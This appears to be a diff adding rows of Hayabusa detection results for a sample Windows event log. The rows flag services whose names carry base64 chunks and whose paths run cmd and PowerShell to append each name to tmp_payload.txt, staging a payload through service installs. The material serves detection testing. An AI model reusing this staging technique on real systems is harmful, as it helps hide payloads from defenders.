+2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
